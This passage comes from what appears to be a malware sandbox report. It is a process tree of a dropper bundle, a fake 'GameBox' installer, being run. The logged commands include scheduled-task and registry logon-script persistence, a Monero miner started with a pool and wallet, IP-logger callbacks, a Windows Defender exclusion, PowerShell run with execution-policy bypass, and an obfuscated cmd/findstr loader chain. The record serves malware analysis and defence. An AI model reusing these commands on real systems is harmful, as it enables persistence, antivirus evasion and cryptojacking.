                                                            • Creates scheduled task(s)
                                                            PID:3536
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:4692
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "customer3" /sc ONLOGON /tr "'C:\Program Files (x86)\Company\NewProduct\Uninstall\customer3.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Creates scheduled task(s)
                                                            PID:5172
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "3v8imR2YudnMKl0lu6pcIC0c" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Opened\3v8imR2YudnMKl0lu6pcIC0c.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Creates scheduled task(s)
                                                            PID:5288
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "mshta" /sc ONLOGON /tr "'C:\Documents and Settings\mshta.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            • Creates scheduled task(s)
                                                            PID:5228
                                                          • C:\Users\Admin\AppData\Local\Temp\is-BQNUF.tmp\Setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-BQNUF.tmp\Setup.exe" /Verysilent
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:5396
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:5148
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:6120
                                                              • C:\Users\Admin\AppData\Local\Temp\is-7ESS1.tmp\Stats.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-7ESS1.tmp\Stats.tmp" /SL5="$202A4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:5228
                                                                • C:\Users\Admin\AppData\Local\Temp\is-IGMF6.tmp\builder.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-IGMF6.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                  4⤵
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:4720
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:4620
                                                              • C:\Users\Admin\AppData\Local\Temp\is-P8C8H.tmp\Inlog.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-P8C8H.tmp\Inlog.tmp" /SL5="$202B8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:3308
                                                                • C:\Users\Admin\AppData\Local\Temp\is-FMFMH.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-FMFMH.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                  4⤵
                                                                    PID:5520
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-1O2GN.tmp\Setup.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-1O2GN.tmp\Setup.tmp" /SL5="$D0056,17339287,721408,C:\Users\Admin\AppData\Local\Temp\is-FMFMH.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                      5⤵
                                                                      • Loads dropped DLL
                                                                      • Drops file in Program Files directory
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:4300
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-5TPO9.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                        6⤵
                                                                          PID:7308
                                                                          • C:\Windows\SysWOW64\expand.exe
                                                                            expand C:\Users\Admin\AppData\Local\Temp\is-5TPO9.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                            7⤵
                                                                            • Drops file in Windows directory
                                                                            PID:6580
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                          6⤵
                                                                            PID:6312
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                              7⤵
                                                                                PID:8692
                                                                            • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                              "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                              6⤵
                                                                                PID:9112
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                6⤵
                                                                                • Checks computer location settings
                                                                                PID:8664
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-5TPO9.tmp\{app}\vdi_compiler.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-5TPO9.tmp\{app}\vdi_compiler"
                                                                                6⤵
                                                                                  PID:7256
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Enumerates connected drives
                                                                          • Modifies system certificate store
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:5428
                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629550572 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                            3⤵
                                                                              PID:5388
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:4492
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-AUNL8.tmp\VPN.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-AUNL8.tmp\VPN.tmp" /SL5="$2022C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:4896
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-FCC6P.tmp\Setup.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-FCC6P.tmp\Setup.exe" /silent /subid=720
                                                                                4⤵
                                                                                  PID:7036
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-119Q8.tmp\Setup.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-119Q8.tmp\Setup.tmp" /SL5="$3033C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-FCC6P.tmp\Setup.exe" /silent /subid=720
                                                                                    5⤵
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in Program Files directory
                                                                                    • Modifies registry class
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:4288
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                      6⤵
                                                                                        PID:6400
                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                          tapinstall.exe remove tap0901
                                                                                          7⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          PID:8124
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                        6⤵
                                                                                          PID:8364
                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                                            7⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Drops file in Windows directory
                                                                                            • Checks SCSI registry key(s)
                                                                                            PID:9028
                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                          6⤵
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:7696
                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                          6⤵
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:9096
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3852
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                    3⤵
                                                                                      PID:6068
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Adds Run key to start application
                                                                                    • Drops file in System32 directory
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1068
                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpE720_tmp.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmpE720_tmp.exe"
                                                                                      3⤵
                                                                                        PID:6536
                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                          4⤵
                                                                                            PID:6312
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                            4⤵
                                                                                              PID:6448
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd
                                                                                                5⤵
                                                                                                  PID:4988
                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                    6⤵
                                                                                                      PID:6012
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                      Esplorarne.exe.com i
                                                                                                      6⤵
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:8056
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                        7⤵
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:8624
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                          8⤵
                                                                                                            PID:8868
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                              9⤵
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:9072
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                10⤵
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:9208
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                  11⤵
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:7400
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                    12⤵
                                                                                                                      PID:8468
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                        13⤵
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        PID:8588
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                          14⤵
                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                          PID:8872
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                            15⤵
                                                                                                                              PID:3752
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                16⤵
                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                PID:956
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                  17⤵
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  PID:8820
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                    18⤵
                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                    PID:8940
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                      19⤵
                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                      PID:5760
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                        20⤵
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:8060
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                          21⤵
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:9156
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            22⤵
                                                                                                                                              PID:8468
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                23⤵
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:9136
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  24⤵
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:8220
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    25⤵
                                                                                                                                                      PID:6268
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        26⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:6856
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          27⤵
                                                                                                                                                            PID:7880
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping RJMQBVDN -n 30
                                                                                                                  6⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:8332
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks computer location settings
                                                                                                          PID:788
                                                                                                          • C:\Users\Admin\Documents\ok8zsG_G73eWWTF6_dfo06GS.exe
                                                                                                            "C:\Users\Admin\Documents\ok8zsG_G73eWWTF6_dfo06GS.exe"
                                                                                                            3⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5960
                                                                                                            • C:\Users\Admin\Documents\ok8zsG_G73eWWTF6_dfo06GS.exe
                                                                                                              C:\Users\Admin\Documents\ok8zsG_G73eWWTF6_dfo06GS.exe
                                                                                                              4⤵
                                                                                                                PID:4128
                                                                                                              • C:\Users\Admin\Documents\ok8zsG_G73eWWTF6_dfo06GS.exe
                                                                                                                C:\Users\Admin\Documents\ok8zsG_G73eWWTF6_dfo06GS.exe
                                                                                                                4⤵
                                                                                                                  PID:6996
                                                                                                              • C:\Users\Admin\Documents\IDGk9XFg8ij8BQUDraWnNrYI.exe
                                                                                                                "C:\Users\Admin\Documents\IDGk9XFg8ij8BQUDraWnNrYI.exe"
                                                                                                                3⤵
                                                                                                                  PID:6856
                                                                                                                • C:\Users\Admin\Documents\FrUmtJMyLjdm0h8N3sfQV2Oi.exe
                                                                                                                  "C:\Users\Admin\Documents\FrUmtJMyLjdm0h8N3sfQV2Oi.exe"
                                                                                                                  3⤵
                                                                                                                    PID:4760
                                                                                                                    • C:\Users\Admin\Documents\FrUmtJMyLjdm0h8N3sfQV2Oi.exe
                                                                                                                      "C:\Users\Admin\Documents\FrUmtJMyLjdm0h8N3sfQV2Oi.exe" -q
                                                                                                                      4⤵
                                                                                                                        PID:8092
                                                                                                                    • C:\Users\Admin\Documents\pEQnXYV1B2rZTYdSGFe3C4hq.exe
                                                                                                                      "C:\Users\Admin\Documents\pEQnXYV1B2rZTYdSGFe3C4hq.exe"
                                                                                                                      3⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:6800
                                                                                                                    • C:\Users\Admin\Documents\jKflH8n1fVEm5N8QLr6ptXRK.exe
                                                                                                                      "C:\Users\Admin\Documents\jKflH8n1fVEm5N8QLr6ptXRK.exe"
                                                                                                                      3⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5920
                                                                                                                    • C:\Users\Admin\Documents\fSYng7yQvYeCQRJ82vVPXPav.exe
                                                                                                                      "C:\Users\Admin\Documents\fSYng7yQvYeCQRJ82vVPXPav.exe"
                                                                                                                      3⤵
                                                                                                                        PID:6184
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\FSYNG7~1.DLL,s C:\Users\Admin\DOCUME~1\FSYNG7~1.EXE
                                                                                                                          4⤵
                                                                                                                            PID:9172
                                                                                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\FSYNG7~1.DLL,Y0kadnhxSg==
                                                                                                                              5⤵
                                                                                                                              • Blocklisted process makes network request
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Modifies system certificate store
                                                                                                                              PID:8160
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\FSYNG7~1.DLL
                                                                                                                                6⤵
                                                                                                                                  PID:4092
                                                                                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\FSYNG7~1.DLL,Kx8LaDE4
                                                                                                                                  6⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:1156
                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                                                                                    7⤵
                                                                                                                                      PID:6252
                                                                                                                                      • C:\Windows\system32\ctfmon.exe
                                                                                                                                        ctfmon.exe
                                                                                                                                        8⤵
                                                                                                                                          PID:1756
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp995A.tmp.ps1"
                                                                                                                                      6⤵
                                                                                                                                        PID:9104
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp6458.tmp.ps1"
                                                                                                                                        6⤵
                                                                                                                                          PID:8424
                                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                            "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                                                                                            7⤵
                                                                                                                                              PID:9768
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                            6⤵
                                                                                                                                              PID:2208
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                              6⤵
                                                                                                                                                PID:9640
                                                                                                                                        • C:\Users\Admin\Documents\dfVIgFCXQWMdD48BlEKn5cPL.exe
                                                                                                                                          "C:\Users\Admin\Documents\dfVIgFCXQWMdD48BlEKn5cPL.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                          PID:2844
                                                                                                                                        • C:\Users\Admin\Documents\Ovlo_4Pjy1xkAuROlNYYFERS.exe
                                                                                                                                          "C:\Users\Admin\Documents\Ovlo_4Pjy1xkAuROlNYYFERS.exe"
                                                                                                                                          3⤵
                                                                                                                                            PID:7000
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-UU2HV.tmp\Ovlo_4Pjy1xkAuROlNYYFERS.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-UU2HV.tmp\Ovlo_4Pjy1xkAuROlNYYFERS.tmp" /SL5="$302D2,138429,56832,C:\Users\Admin\Documents\Ovlo_4Pjy1xkAuROlNYYFERS.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              PID:6000
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-D4TTR.tmp\Setup.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-D4TTR.tmp\Setup.exe" /Verysilent
                                                                                                                                                5⤵
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                PID:4952
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                  6⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                  PID:7784
                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629550572 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:1020
                                                                                                                                            • C:\Users\Admin\Documents\9kqkEnvz4FBBPgyNSzunPcOt.exe
                                                                                                                                              "C:\Users\Admin\Documents\9kqkEnvz4FBBPgyNSzunPcOt.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:4712
                                                                                                                                            • C:\Users\Admin\Documents\j28stzFQjh5ZDidZY0HOBXiP.exe
                                                                                                                                              "C:\Users\Admin\Documents\j28stzFQjh5ZDidZY0HOBXiP.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:5440
                                                                                                                                              • C:\Users\Admin\Documents\j28stzFQjh5ZDidZY0HOBXiP.exe
                                                                                                                                                C:\Users\Admin\Documents\j28stzFQjh5ZDidZY0HOBXiP.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:7232
                                                                                                                                              • C:\Users\Admin\Documents\fEabvEFIjmeVfrh6R5b_9FKE.exe
                                                                                                                                                "C:\Users\Admin\Documents\fEabvEFIjmeVfrh6R5b_9FKE.exe"
                                                                                                                                                3⤵
                                                                                                                                                  PID:6604
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5432195.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5432195.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5176
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5545558.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5545558.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                      PID:4324
